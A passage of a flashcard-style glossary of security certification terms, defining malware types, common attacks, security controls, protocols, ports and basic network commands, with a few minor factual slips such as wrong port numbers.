have system-level or kernel access and can modify system files and system access. Rootkits hide their running processes to avoid detection with hooking techniques. Tools that can inspect RAM can discover these hidden hooked processes.
Temperature controls
help ensure a relatively constant temperature.
Business continuity planning
helps an organization predict and plan for potential outages of critical services or functions. The goal is to ensure that critical business operations continue and the organization can survive the outage.
DNSSEC
helps prevent DNS poisoning attacks.
Shielding
helps prevent electromagnetic interference (EMI) and radio frequency interference (RFI) from interfering with normal signal transmissions. EMI shielding prevents outside interference sources from corrupting data and prevents data from emanating outside the cable.
Preparation
helps prevent incidents such as malware infections. Personnel review the policy periodically and in response to lessons learned after incidents.
Error and exception handling
helps protect the integrity of the operating system and controls the errors shown to users. Applications should show generic error messages to users but log detailed information.
Forensic evaluation
helps the organization collect and analyze data as evidence it can use in the prosecution of a crime. When collecting data for a forensic analysis, you should collect it from the most volatile to the least volatile.
Disabling SSID broadcast
hide the network from casual users, but an attacker can easily discover it with a wireless sniffer.
Two types of IDSs
host-based intrusion detection system (HIDS) and network-based intrusion detection system (NIDS)
data retention policy
identifies how long data is retained, and sometimes specifies where it is stored.
Business impact analysis (BIA)
identifies mission-essential functions and critical systems that are essential to the organization's success. ▪ It also identifies maximum downtime limits for these systems and components, various scenarios that can impact these systems and components, and the potential losses from an incident.
Mean Time to Recover (MTTR)
identifies the average (the arithmetic mean) time it takes to restore a failed system.
Recovery Time Objective (RTO)
identifies the maximum amount of time it should take to restore a system after an outage. It is derived from the maximum allowable outage time identified in the BIA.
Passive scan
identify the active operating systems, applications and ports throughout a network, monitoring activity to determine the network's vulnerabilities. However, while passive scanners can provide information about weaknesses, they can't take action to resolve security problems. These scanners can check the current software and patch versions on networked devices, indicating which devices are using software that presents a potential gateway for hackers or trojan attacks, and reference this information against public databases containing lists of current patches. A network administrator can set passive scanners to run continuously or to operate at specified intervals.
Access Control List (ACL)
identify what traffic is allowed and what traffic is blocked. An ACL can control traffic based on networks, subnets, IP addresses, ports, and some protocols. Implicit deny blocks all access that has not been explicitly granted. Routers and firewalls use implicit deny as the last rule in the access control list.
Environmental threat
include natural threats such as weather events.
DNS zones
include records such as A records for IPv4 addresses and AAAA records for IPv6 addresses.
Scheduling methods
include round-robin and source IP address affinity. ▪ Source IP address affinity scheduling ensures clients are redirected to the same server for an entire session.
Geographic considerations for backups
include storing backups off-site, choosing the best location, and considering legal implications and data sovereignty.
Disaster Recovery plan (DRP)
includes a hierarchical list of critical systems and often prioritizes services to restore after an outage. Testing validates the plan. The final phase of disaster recovery includes a review to identify any lessons learned and may include an update of the plan.
Malware (malicious software)
includes a wide range of software that has malicious intent. When adware first emerged, its intent was primarily to learn a user's habits for the purpose of targeted advertising. As the practice of gathering information on users became more malicious, more people began to call it spyware.
asset
includes any product, system, resource, or process that an organization values.
Switch port security
includes disabling unused ports and limiting the number of MAC addresses per port. A more advanced implementation is to restrict each physical port to only a single specific MAC address.
Personally Identifiable Information (PII)
includes information such as a full name, birth date, biometric data, and identifying numbers such as a SSN. Organizations have an obligation to protect PII and PHI and often identify procedures for handling and retaining PII in data policies.
hot site
includes personnel, equipment, software, and communication capabilities of the primary site with all the data up to date. A hot site provides the shortest recovery time compared with warm and cold sites. It is the most effective disaster recovery solution, but it is also the most expensive to maintain.
Mobile device management (MDM)
includes the technologies to manage mobile devices. Manages a devices... Application management, Full device encryption, Storage segmentation, Content management, Containerization, Passwords and PINs, Biometrics, Screen locks, Remote wipe, Geofencing, GPS tagging, and Context-aware authentication.
Hybrid Cloud
includes two or more private, public, or community clouds, but each cloud remains separate and is only linked by technology that enables data and application portability
Amplification attacks
increase the amount of traffic sent to or requested from a victim and can be used against a wide variety of systems, including individual hosts, DNS servers, and NTP servers. Smurf attack spoofs the source address of a directed broadcast ping packet to flood a victim with ping replies.
Load balancing
increases the overall processing power of a service by sharing the load among multiple servers. Configurations can be active-passive, or active-active.
false positive from a vulnerability scan
indicates the scan detected a vulnerability, but the vulnerability doesn't exist.
Private Data
information about individuals that should remain private.
Honeypot
intended to look sweet to the attacker, it's a server that is left open or appears to have been sloppily locked down, allowing an attacker relatively easy access. The intent is for the server to look like an easy target so that the attacker spends his time in the honeypot instead of in a live network.
Demilitarized zone (DMZ)
is a buffered zone between a private network and the Internet.
Omni Antenna
is a class of antenna which radiates equal radio power in all directions perpendicular to an axis (azimuthal directions), with power varying with angle to the axis (elevation angle), declining to zero on the axis. If you compare an ommni and a dipole radiating the same power you will find that there is more power from the dipole than an ommni in certain directions.
Purging
is a general sanitization term indicating that all sensitive data has been removed from a device.
bcrypt
is a key derivation function for passwords based on the Blowfish cipher. Besides incorporating a salt to protect against rainbow table attacks, bcrypt is an adaptive function: over time, the iteration count can be increased to make it slower, so it remains resistant to brute-force search attacks even with increasing computation power. The bcrypt function is the default password hash algorithm for BSD and many other systems.
SPOF (Single Point of Failure)
is a part of a system that, if it fails, will stop the entire system from working. SPOFs are undesirable in any system with a goal of high availability or reliability, be it a business practice, software application, or other industrial system.
Forward Secrecy
is a property in key exchange where if a key is compromised it can only be used to decrypt a single message, but can not be used to decrypt future messages. Perfect forward secrecy is when this process is unbreakable.
Secure File Transfer Protocol (SFTP)
is a secure implementation of FTP. It is an extension of Secure Shell (SSH) port 22
Public-Key Cryptography Standards (PKCS)
is a set of voluntary standards created by RSA and security leaders.
logic bomb
is a string of code embedded into an application or script that will execute in response to an event. The event might be a specific date or time, or a user action such as when a user launches a specific program.
remote access Trojan (RAT)
is a type of malware that allows attackers to take control of systems from remote locations. It is often delivered via drive-by downloads.
Ransomware
is a type of malware that takes control of a user's system or data. Criminals then attempt to extort payment from the victim. Ransomware often includes threats of damaging a user's system or data if the victim does not pay the ransom.
Host-based intrusion detection system (HIDS)
is additional software installed on a system such as a workstation or server. It provides protection to the individual host and can detect potential attacks and protect critical operating system files.
Online Certificate Status Protocol (OCSP)
is an Internet protocol used for obtaining the revocation status of an X.509 digital certificate.[1] It is described in RFC 6960 and is on the Internet standards track. It was created as an alternative to certificate revocation lists (CRL), specifically addressing certain problems associated with using CRLs in a public key infrastructure (PKI)
trusted operating system
meets a set of predetermined requirements, such as those identified in the Common Criteria. It uses the mandatory access control (MAC) model.
Principle of Least privilege
is an example of a technical control implemented with access controls. Privileges are the rights and permissions assigned to authorized users. Least privilege is a technical control. It specifies that individuals or processes are granted only those rights and permissions needed to perform their assigned tasks or functions..
File Transfer Protocol Secure (FTPS)
is an extension of FTP and uses TLS to encrypt FTP traffic. Port 995 (The TLS port).
SAN (Subject Alternative Name) Certificate
is an extension to the X.509 specification that allows users to specify additional host names for a single SSL certificate. The use of the SAN extension is standard practice for SSL certificates, and it's on its way to replacing the use of the common name.
OAuth
is an open standard for authorization many companies use to provide secure access to protected resources. Instead of creating a different account for each website you access, you can often use the same account that you've created with Google, Facebook, PayPal, Microsoft, or Twitter. Unlike SAML, it doesn't deal with authentication.
Certificate Authority (CA)
is an organization that is responsible for issuing, revoking, and distributing certificates.
Certificate Revocation List
is created and distributed to all CAs to revoke a certificate or key. By checking the CRL you can check if a particular certificate has been revoked. The certificates for which a CRL should be maintained are often X.509/public key certificates, as this format is commonly used by PKI schemes.
Need-to-know principle
is similar to the principle of least privilege in that users are granted access only to the data and information that they need to know for their job. Notice that need to know is focused on data and information.
Spyware
is software installed on users' systems without their awareness or consent. Its purpose is often to monitor the user's computer and the user's activity.
Data sovereignty
is the concept that information which has been converted and stored in binary digital form is subject to the laws of the country in which it is located.
Risk management
is the practice of identifying, monitoring, and limiting risks to a manageable level.
Sideloading
is the process of installing software on an Android device from a source other than an authorized store.
Privilege escalation
is when an attacker turns a normal user account into an admin account.
adware
its intent was primarily to learn a user's habits for the purpose of targeted advertising. As the practice of gathering information on users became more malicious, more people began to call it spyware.
hacktivist
launches attacks as part of an activist movement or to further a cause.
Bluebugging
like bluesnarfing, but it goes a step further. In addition to gaining full access to the phone, the attacker installs a backdoor. The attacker can have the phone call the attacker at any time, allowing the attacker to listen in on conversations within a room.
virus
malicious code that attaches itself to a host application. The host application must be executed to run, and the malicious code executes when the host application is executed.
Network access control (NAC)
methods provide continuous security monitoring by inspecting computers and preventing them from accessing the network if they don't pass the inspection. NAC provides a measure of control for these other computers. It ensures that clients meet predetermined characteristics prior to accessing a network. NAC systems often use health as a metaphor, indicating that a client meets these predetermined characteristics, such as updates, anti-virus, and firewall.
Active reconnaissance (Pen Testing)
methods use tools such as network scanners to gain information on the target.
SDLC (Software Development Lifecycle)
models provide structure for software development projects.
Rooting
modifies an Android device, giving users root-level access to the device.
Intrusion Detection Systems (IDSs)
monitor a network and send alerts when they detect suspicious events on a system or network. Both IDSs and IPSs have the ability of detecting attacks using similar detection methods. The biggest difference is in their responses to an attack.
Network-based intrusion detection system (NIDS)
monitors activity on the network. An administrator installs NIDS sensors or collectors on network devices such as routers and firewalls. When setting up a NIDS you must enable promiscuous mode on the internal switch, that way the NIDS can receive all traffic. Also enable promiscuous mode mode on the Network Interface Card(NIC) to allow it to accept all frames
Buffer Overflow Attack
occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity. In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. Buffer overflow attacks are said to have arisen because the C programming language supplied the framework, and poor programming practices supplied the vulnerability.
Tailgating (also called piggybacking)
occurs when one user follows closely behind another user without using credentials.
Typo squatting (also called URL hijacking)
occurs when someone buys a domain name that is close to a legitimate domain name. People often do so for malicious purposes.
hash collision
occurs when the hashing algorithm creates the same hash from different passwords. Birthday attacks exploit collisions in hashing algorithms. Password Attack
IRP Definitions
of incident types.
Cipher locks
often have four or five buttons labeled with numbers. ▪ One challenge with cipher locks is that they don't identify the users.
Secure / Multipurpose Internet Mail Extensions( S/MIME)
one of the most popular standards used to digitally sign and encrypt email.
Protecting Data
one of the most valuable resources any organization manages, second only to its people. The primary methods of protecting the confidentiality of data are with encryption and strong access controls. Database column encryption protects individual fields within a database.
Internet Protocol security (IPsec) Transport mode
only encrypts the payload and is commonly used in private networks, but NOT with VPNs. If traffic is transmitted and used only within a private network, there isn't any need to hide the IP addresses by encrypting them.
split tunnel (VPN)
only encrypts traffic destined for the VPN's private network.
Job rotation
policies require employees to change roles on a regular basis. Employees might change roles temporarily, such as for three to four weeks, or permanently. ▪ This helps ensure that employees cannot continue with fraudulent activity indefinitely.
bring your own device (BYOD)
policy allows employees to connect their own personal devices to the corporate network.
choose your own device (CYOD)
policy provides a list of approved devices. Employees with a device on the list can connect them to the network.
Time of Day Restrictions
prevent users from logging on during restricted times. They also prevent logged-on users from accessing resources during certain times. Location- based policies restrict access based on the location of the user.
Separation of duties
prevents any single person or entity from controlling all the functions of a critical or sensitive process by dividing the tasks between employees. ▪ This helps prevent potential fraud, such as if a single person prints and signs checks.
Faraday cage
prevents signals from emanating beyond the cage.
Public Cloud
promotes massive, global, and industrywide applications offered to the general public
flood guards
protect against MAC flood attacks. When enabled, the switch will limit the amount of memory used to store MAC addresses for each port.
Cable troughs
protect cables distributed throughout a building in metal containers.
Transport Layer Security (TLS)
protocol is the designated replacement for SSL and should be used instead of SSL. encryption protocols that have been commonly used to encrypt data-intransit. TLS is the replacement for SSL. Both TLS and SSL require certificates issued by Certificate Authorities (CAs). TLS encrypts HTTPS traffic, but it can also encrypt other traffic
Secure Sockets Layer (SSL)
protocol was the primary method used to secure HTTP traffic as Hypertext Transfer Protocol Secure (HTTPS). encryption protocols that have been commonly used to encrypt data-intransit. TLS is the replacement for SSL. Both TLS and SSL require certificates issued by Certificate Authorities (CAs). TLS encrypts HTTPS traffic, but it can also encrypt other traffic
Higher-tonnage HVAC systems
provide more cooling capacity. This keeps server rooms at lower operating temperatures and results in fewer failures. HVAC systems increase availability by controlling temperature and humidity. HVAC systems should be integrated with the fire alarm systems and either have dampers or the ability to be turned off in the event of a fire.
Functional exercises
provide personnel with an opportunity to test the plans in a simulated operational environment.
Host-based firewalls
provide protection for individual hosts, such as servers or workstations. A host-based firewall provides intrusion protection for the host. Linux systems support xtables for firewall capabilities.
Web application firewalls
provide strong protection for web servers. They protect against several different types of attacks, with a focus on web application attacks and can include load-balancing features.
Barricades
provide stronger barriers than fences and attempt to deter attackers.
Mean Time Between Failures (MTBF)
provides a measure of a system's reliability and is usually represented in hours.
backdoor
provides another way to access a system. Many types of malware create backdoors, allowing attackers to access systems from remote locations. Employees have also created backdoors in applications and systems.
Secure Real-time Transport Protocol (SRTP)
provides encryption, message authentication, and integrity for RTP.
Incident Response Plan (IRP)
provides more detail than the incident response policy. It provides organizations with a formal, coordinated plan personnel can use when responding to an incident.
Video surveillance
provides reliable proof of a person's location and activity. It can identify who enters and exits secure areas and can record theft of assets. ▪ Cameras are connected to a closed-circuit television (CCTV) system, which transmits signals from video cameras to monitors that are similar to TVs.
Virtual Private Network (VPN)
provides remote access to a private network via a public network.
Cryptography
provides two primary security methods you can use with email: digital signatures and encryption. There are times when you want to ensure that email messages are only readable by authorized users. ▪ You can encrypt an email and just as any other time encryption is used, encryption provides confidentiality.
Risk Assessment
quantifies or qualifies risks based on different values or judgments. A risk assessment is a point-in-time assessment, or a snapshot. ▪ In other words, it assesses the risks based on current conditions, such as current threats, vulnerabilities, and existing controls. use quantitative measurements or qualitative measurements.
Intrusion Prevention Systems (IPSs)
react to attacks in progress and prevent them from reaching systems and networks. Both IDSs and IPSs have the ability of detecting attacks using similar detection methods. The biggest difference is in their responses to an attack.
POP3
receives email on port 110 ▪ Encrypts with SSL or TLS on TCP port 995.
IMAP4
receives email uses port 143 ▪ Encrypts with SSL or TLS on TCP port 993.
Logs
record what happened, when it happened, where it happened, and who did it. ▪ By monitoring logs, administrators can detect event anomalies. Additionally, by reviewing logs, security personnel can create an audit trail.
Usage auditing
records user activity in logs. A usage auditing review looks at the logs to see what users are doing and it can be used to re-create an audit trail.
Humidity controls
reduce the potential for damage from electrostatic discharge and damage from condensation.
Internal threat
refer to employees within an organization
SSL/ TLS accelerators
refer to hardware devices focused on handling Transport Layer Security (TLS) traffic.
High availability
refers to a system or service that needs to remain operational with almost zero downtime.
Cloud computing
refers to accessing computing resources via a different location than your local computer. In most scenarios, you're accessing these resources through the Internet.
Normalization of a database
refers to organizing the tables and columns to reduce redundant data and improve overall database performance.
Wiping
refers to the process of completely removing all remnants of data on a disk. A disk wiping tool might use a bit-level overwrite process that writes different patterns of 1s and 0s multiple times to ensures that the data on the disk is unreadable.
Bluesnarfing
refers to the unauthorized access to, or theft of information from, a Bluetooth device.
Jailbreaking
removes all software restrictions from an Apple device.
Mandatory vacation policies
require employees to take time away from their job. These policies help to deter fraud and discover malicious activities while the employee is away.
Gramm-Leach Bliley Act (GLBA)
requires financial institutions to provide consumers with a privacy notice explaining what information they collect and how that information is used.
Sarbanes-Oxley Act (SOX)
requires that executives within an organization take individual responsibility for the accuracy of financial reports. It also includes specifics related to auditing, and identifies penalties to individuals for noncompliance.
clean desk policy
requires users to organize their areas to reduce the risk of possible data theft. It reminds users to secure sensitive data and may include a statement about not writing down passwords.
Domain Name Service (DNS)
resolves host names to IP addresses. DNS uses TCP port 53 for zone transfers and UDP port 53 for DNS client queries. Most Internet-based DNS servers run BIND software on Unix or Linux servers, and it's common to configure DNS servers to only use secure zone transfers.
Recovery (Incident Response Process)
returns a system to normal operation.
Permission auditing
reviews help ensure that users have only the access they need and no more and can detect privilege creep issues.
Credentialed scans
run under the context of a valid account and are typically more accurate than non-credentialed scans.
Cross-site request forgery (XSRF)
scripting causes users to perform actions on web sites, such as making purchases, without their knowledge. In some cases, it allows an attacker to steal cookies and harvest passwords.
worm
self-replicating malware that travels throughout a network without the assistance of a host application or user interaction. A worm resides in memory and can use different transport protocols to travel over the network.
Fuzzing techniques
send random strings of data to applications looking for vulnerabilities. Fuzzing is a software testing technique that involves providing invalid, unexpected, or random data to as inputs to a computer program. The program is then monitored for exceptions such as crashes, or failed validation, or memory leaks.
Virtual local area networks (VLANs)
separate or segment traffic on physical networks. You can create multiple VLANs with a single Layer 3 switch. A VLAN can logically group several different computers together, or logically separate computers, without regard to their physical location. VLANs are also used to separate traffic types, such as voice traffic on VLAN and data traffic on a separate VLAN.
Community Cloud
serves a specific community with common business models, security requirements, and compliance considerations
Private Cloud
serves only one customer or organization and can be located on the customer's premises or off the customer's premises
Backup media
should be protected with the same level of protection as the data in the backup.
arp -a
shows the ARP cache on windows.
Signature-based antivirus
software detects known malware based on signature definitions.
physical security control
something you can physically touch, such as a hardware lock, a fence, an identification badge, and a security camera... Perimeter, Buildings, Secure work areas, Server and network rooms, Hardware, Airgap, and Signs.
disablement policy
specifies how to manage accounts in different situations. For example, most organizations require administrators to disable user accounts as soon as possible when employees leave the organization.
Incident response procedures
start with preparation to prepare for and prevent incidents.
Switch loop protection
such as STP (Spanning Tree Protocol) or RSTP (Rapid) is necessary to protect against switching loop problems, such as those caused when two ports of a switch are connected together.
security information and event management (SIEM)
system provides a centralized solution for collecting, analyzing, and managing data from multiple sources. It typically includes aggregation and correlation capabilities to collect and organize log data from multiple sources. It also provides continuous monitoring with automated alerts and triggers.
Heating, ventilation, and air conditioning (HVAC)
systems are important physical security controls that enhance the availability of systems.
Zero-day exploits
take advantage of vulnerabilities that aren't known by trusted sources, such as operating system vendors and antivirus vendors..
Session hijacking
takes advantage of session IDs stored in cookies. When a user logs on to a web site, the web site often returns a small text file (called a cookie) with a session ID. In a session hijacking attack, the attacker utilizes the user's session ID to impersonate the user.
Whaling
targets high-level executives.
Data loss prevention (DLP)
techniques and technologies can block the use of USB devices to prevent data loss and monitor outgoing email traffic for unauthorized data transfers.
IV attacks
the attacker uses packet injection techniques to add additional packets into the data stream. The AP responds with more packets, increasing the probability that it will reuse a key. An IV attack using packet injection decreases the time it takes to crack a WEP key to a very short time, sometimes less than a minute. WEP should never be used.
Overwriting/Flashing
the firmware on an Android device with custom firmware is another way to root an Android device.
spear phishing
the fraudulent practice of sending emails ostensibly from a known or trusted sender in order to induce targeted individuals to reveal confidential information. this attack targets specific groups of users. It could target employees within a company or customers of a company. Digital signatures provide assurances to recipients about who sent an email, and can reduce the success of spear phishing.
Input validation
the practice of checking data for validity before using it. Input validation prevents an attacker from sending malicious code that an application will use by either sanitizing the input to remove malicious code or rejecting the input. ▪ Input validation includes verifying that only required characters or ranges or values are used. It also can block HTML codes and prevent the use of certain characters such as dashes or apostrophe. ▪ The lack of input validation is one of the most common security issues on web-based applications. ▪ Input validation verifies the validity of inputted data before using it, and server-side validation is more secure than client-side validation. ▪ Input validation protects against many attacks, such as buffer overflow, SQL injection, command injection, and cross- site scripting (XSS) attacks. There are two primary ways to do input validation: client-side validation and server-side validation. Thus with poor input validation you increase your risk with regard to exposure to major software exploits.
Tailgating
the practice of one person following closely behind another without showing credentials. Use a mantrap to solve tailgating.
Phishing
the practice of sending email to users with the purpose of tricking them into revealing personal information or clicking on a link. A phishing attack often sends the user to a malicious web site that appears to the user as a legitimate site.
Bluejacking
the practice of sending unsolicited messages to nearby Bluetooth devices.
Onboarding
the process of granting individuals access to an organization's computing resources after being hired. ▪ This includes providing the employee with a user account and granting access to appropriate resources.
Pulverizing
the process of physically destroying media to sanitize it, such as with a sledge hammer (and safety goggles).
Pivoting (Pen Testing)
the process of using an exploited system to target other systems.
Data exfiltration
the unauthorized transfer of data out of a network.
Sandboxing
the use of an isolated area and it is often used for testing. You can create a sandbox with a virtual machine (VM) and on Linux systems with the chroot command. A secure deployment environment includes development, testing, staging, and production elements.
Public-Key Infrastructure X.509 (PKIX)
the working group formed by the IETF to develop standards and models for the PKI environment. The X.509 standard defines the certificate formats and fields for public keys. It also defines the procedures that should be used to distribute public keys.
Authentication Header (AH)
to allow each of the hosts in the IPsec conversation to authenticate with each other before exchanging data. AH provides authentication and integrity.
Version control
tracks the versions of software as it is updated, including who made the update and when.
Security awareness
training programs reinforce user compliance with security policies and help reduce risks posed by users.
Clickjacking
tricks users into clicking something other than what they think they're clicking.
privacy threshold assessment
typically a simple questionnaire completed by system or data owners. ▪ It helps identify if a system processes data that exceeds the threshold for PII. ▪ If the system processes PII, a privacy impact assessment helps identify and reduce risks related to potential loss of the PII.
Spoofing attacks
typically change data to impersonate another system or person. ▪ MAC spoofing attacks change the source MAC address ▪ IP spoofing attacks change the source IP address.
Non-regulatory Framework
typically identifies common standards and best practices that organizations can follow.
Industrial control system (ICS)
typically refers to systems within large facilities such as power plants or water treatment facilities. An ICS is controlled by a supervisory control and data acquisition (SCADA) system. Ideally, these systems are contained within isolated networks, such as within a virtual local area network (VLAN), that do not have access to the Internet. If they are connected to the corporate network, they are often protected by a network intrusion prevention system (NIPS) to block unwanted traffic.
Spam
unwanted or unsolicited email. Some spam is harmless advertisements, while much more is malicious. Spam can include malicious links, malicious code, or malicious attachments.
File Transfer Protocol (FTP)
uploads and downloads large files to and from an FTP server. By default, FTP transmits data in cleartext. Uses TCP ports 20/21.
Dictionary attacks
use a file of words and common passwords to guess a password. ▪ Account lockout policies help protect against brute force attacks and complex passwords thwart dictionary attacks. Password Attack
Symmetric algorithms
use a key to encrypt data and require the same key to decrypt that data.
Qualitative measurements (Risk Assessment)
use judgments. Both methods have the same core goal of helping management make educated decisions based on priorities.
Quantitative measurements (Risk Assessment)
use numbers, such as a monetary figure representing cost and asset values. Both methods have the same core goal of helping management make educated decisions based on priorities.
HTTP and HTTPS
use ports 80 and 443 and transmit data over the Internet in unencrypted and encrypted formats, respectively.
Asymmetric algorithms
use two keys, one key encrypt and a different key to decrypt data.
non-disclosure agreement (NDA)
used between two entities to ensure that proprietary data is not disclosed to unauthorized entities.
Unified Extensible Firmware Interface (UEFI)
used in modern systems instead of a BIOS. UEFI performs many of the same functions as BIOS, but provides some enhancements. Both BIOS and UEFI can be upgraded using a process called flashing. Flashing overwrites the software within the chip with newer software.
Public key
used to encrypt the data which is then decrypted with the private key.
Private key
used to encrypt the data which is then decrypted with the public key.
Microsoft CHAP (MS-CHAP)
uses MD4 hash and Microsoft Point-to-Point encryption (MPPE). This is the Microsoft implementation of CHAP, which is used only by Microsoft clients.
Trivial File Transfer Protocol (TFTP)
uses UDP port 69 and is used to transfer smaller amounts of data, such as when communicating with network devices.
Layered security or defense-in-depth practices
uses control diversity, implementing administrative, technical, and physical security controls. Vendor diversity utilizes controls from different vendors. User training informs users of threats, helping them avoid common attacks.
qualitative risk assessment
uses judgment to categorize risks based on likelihood of occurrence (or probability) and impact. Some qualitative risk assessments use surveys or focus groups. One of the challenges with a qualitative risk assessment is gaining consensus on the probability and impact.
Waterfall
uses multiple stages going from top to bottom, with each stage feeding the next stage.
Passive reconnaissance (Pen Testing)
uses open-source intelligence methods, such as social media and an organization's web site.
Role-based access control (role-BAC)
uses roles to manage rights and permissions for users. This is useful for users within a specific department who perform the same job functions. A role-BAC model uses roles based on jobs and functions. A matrix is a planning document that matches the roles with the required privileges. This type of group-based access control, where access is based on roles or groups, simplifies user administration. Group-based privilege control reduces the administrative workload of access management. Administrators put user accounts into security groups, and assign privileges to the groups. Users within a group automatically inherit the privileges assigned to the group.
Rule-based access control (rule-BAC)
uses rules to control access . The most common example are rules in an access control list on routers or firewalls. However, more advanced implementations will cause rules to trigger within applications as well. Rule-based access control is based on a set of approved instructions, such as an access control list. Some rule-BAC systems use rules that trigger in response to an event, such as modifying ACLs after detecting an attack or granting additional permissions to a user in certain situations.
Social engineering
uses social tactics to trick users into giving up information or performing actions they wouldn't normally take. Social engineering attacks can occur in person, over the phone, while surfing the Internet, or via email.
Network scanners
uses various techniques to gather information about hosts within a network. Ping scan, Port scan, service scan, And Operating system (OS) detection techniques.
SDN (Software Defined Network)
uses virtualization technologies to route traffic instead of using hardware routers and switches. More specifically, an SDN separates the data planes and control planes within a network.
software defined network (SDN)
uses virtualization technologies to route traffic instead of using hardware routers and switches. More specifically, an SDN separates the data planes and control planes within a network.
Jamming attack
usually prevents all users from connecting to a wireless network using a wireless jammer.
Digital Signatures
validate the integrity of the message and its sender.
Testing
validates business continuity plans.
Stress testing
verifies an application can handle a load.
service scan
verifies the protocol or service. Network scanner
false negative
when an attacker is actively attacking the network, but the system does not detect it. A false negative is when an attack is occurring, but the system doesn't detect and report it.
Dumpster diving
when an threat actor searches through trash looking for information. Shredding or burning documents mitigates this threat.
Race condition
when two or more modules of an application, or two or more applications, attempt to access a resource at the same time
cold site
will have power and connectivity needed for a recovery site, but little else. Cold sites are the least expensive and the hardest to test.
Key data roles
within an organization are responsible for protecting data.
identification
Users claim an identity with a unique username.
Common Access Card (CAC)
A Department of Defense (DoD) smart card used for identification. Also includes a picture of the user and other readable information.
tracert command (traceroute on Mac)
A Microsoft Windows-based command that displays every router hop along the path from a source host to a destination host on an IP network. Information about a router hop can include such information as the IP address of the router hop and the round-trip delay of that router hop.
ifconfig
A TCP/IP configuration and management utility used with UNIX and Linux systems. Same as ipconfig on Windows. (Short for interface configuration)
Hashing
A cryptographic method that uses an algorithm such as MD5 or SHA (SHA-1 -256 -384 -512) to create a hash of a message. If the message changes, the hash will change. Cryptographic hashes are calculated against a message or a file. Hashing doesn't tell you what modified a message, just if it has been modified. Hashing verifies integrity. the process of converting a message, or data, into a numeric value.
Steganography
A field within cryptography; uses images to hide data. Hiding a message within a message.
Geolocation
A group of technologies used to identify a user's location and is the most common method used in this factor.
Type I hypervisor
A hypervisor that can run directly on a computer without an underlying host operating system. Used for virtualization in large-scale data centers.
Type II hypervisor
A hypervisor that runs within a conventional operating system environment. USed for implementing virtualization on a PC.
Authentication
A method for confirming users' identities, such as with a password. the process of verifying that the sender is who they say they are.
Password Expiration
An account enforcement policy that determines how many days a password can be used before the user is required to change it.
Password Complexity
An account enforcement policy that determines passwords must meet complexity requirements.
Application Cell
Also known as application containers. A virtualization technology that runs services or applications within isolated application cells (or containers). Each container shares the kernel of the host. Basically removed the guest OS in order to reduce overhead. The guest OS is not needed in many cases. (Kubernetes or Docker)
Something you do
An authentication factor indicating action, such as gestures on a touch screen.
Somewhere you are
An authentication factor indicating location, often using geolocation technologies.
Kerberos
An authentication system developed by the Massachusetts Institute of Technology (MIT) and used to verify the identity of networked users. Used within Windows Active Directory domains and some Unix environments known as realms. A method of issuing tickets. Kerberos version 5 requires time of all systems to be synchronized and within five minutes of each other. A database of subjects or users. in a microsoft environment, this is Active Directory, but it could be any database of users. Kerberos is a network authentication protocol.
AAA
Authentication, Authorization, and Accounting. AAA protocols are used in remote access systems. For example, TACACS+ is an AAA protocol that uses multiple challenges and responses during a session. Authentication verifies a user's identification. Authorization determines if a user should have access. Accounting tracks a user's access with logs.
False rejection
Biometric system incorrectly rejects an authorized user., The False Rejectiuon rate (FRR, also known as false nonmatch rate) identifies the percentage of times false rejections occurs.
ARP command
Can be used in either the Microsoft Windows or the UNIX environment to see what a Layer 2 MAC address corresponds to in a Layer 3 IP address. (Address Resolution Protocol)
Patching
Can fix software bugs and increase availability.
Changing default passwords
Changing default password on software, devices, and also changing default administrator username.
CIA security triad
Confidentiality, Integrity, Availability
load balancing
Distributing a computing or networking workload across multiple systems to avoid congestion and slow performance.
Use Case
Describes a goal that an organization wants to achieve. Identify and clarify requirements to achieve the goal.
Dual-factor authentication (two-factor authentication/2FA, 2-step authentication)
Different factors of authentication, such as something you have and something you know.
Certificates
Digitally signed electronic documents that bind a public key with a user identity. Digital signatures require the use of certificates and a public key infrastructure. Provide the primary method of identifying that a given user is valid ▪ Can be used to store authorization information ▪ Can verify or certify that a system is using the correct software and processes to communicate
netstat -n
Displays addresses and port numbers in numerical order.
netstat -a
Displays all connections and listening ports.
Requirements for a smart card
Embedded certificate and public key infrastructure
Biometric errors
False Acceptance, False Rejection, Crossover error rate (CER).
Disk Redundancies
Fault-tolerant disks such as RAID-1, RAID-5, and RAID-6 allow a system to continue to operate even if a disk fails
Biometric methods
Fingerprints, Retina scanners, Iris scanner, voice recognition, facial recognition. Not 100% safe. multifactor is needed
Cooling systems
Heating, ventilation, and air conditioning (HVAC) systems improve the availability of systems by reducing outages from overheating.
Access Control
Identification, Authentication, and Authorization combined provide access controls and help ensure that only authorized personnel can access data.
Availability
Indicates that data and services are available when needed. Implement redundancy and fault-tolerant methods to ensure high levels of availability for key systems.
Password history and password reuse
Many users would prefer to use the same password forever simply because it's easier to remember.
VM Sprawl
Occurs when an organization has many VMs that aren't managed properly
Guest (virtualization)
Operating systems running on the host system are guests or guest machines
Password management features
Password Complexity, Password expiration, password history and password reuse, changing default passwords.
Something you know
Password or PIN
ping -t
Ping continuously sends ICMP packets until stopped with Ctrl+C
Encryption
Process of converting readable data into unreadable characters to prevent unauthorized access.
Authentication (AAA)
Prove an Identity.
Integrity
Provides assurance that data has not changed. verifies that data has NOT been modified in transport or at rest.
snapshot
Provides you with a copy of the VM at a moment in time, which you can use as a backup.
Risk Mitigation
Reduces the chances that a threat will exploit a vulnerability, or reduce the impact of the risk, by implementing security controls. Accomplished anytime steps are taken to reduce risk.
Risk Mitigation
Reduces the chances that a threat will exploit a vulnerability, or reduces the impact of the risk, by implementing security controls.
ipconfig /flushdns
Will clear your DNS resolver cache.
ipconfig /all
Show all TCP/IP details
Hypervisor
Software that creates, runs, and manages virtual machines
Authentication Factors
Something you know, something you have, something you are, somewhere you are, and something you do
Key Distribution Center (KDC)
System for granting authentication in Kerberos. uses a complex process of issuing ticket-granting tickets (TGTs) and other tickets. The KDC (or TGT server) packages user credentials within a ticket.
First three control types
Technical, Administrative, Physical
Site Redundancies
organization can move critical systems to an alternate site, such as a hot site.
Non-repudiation
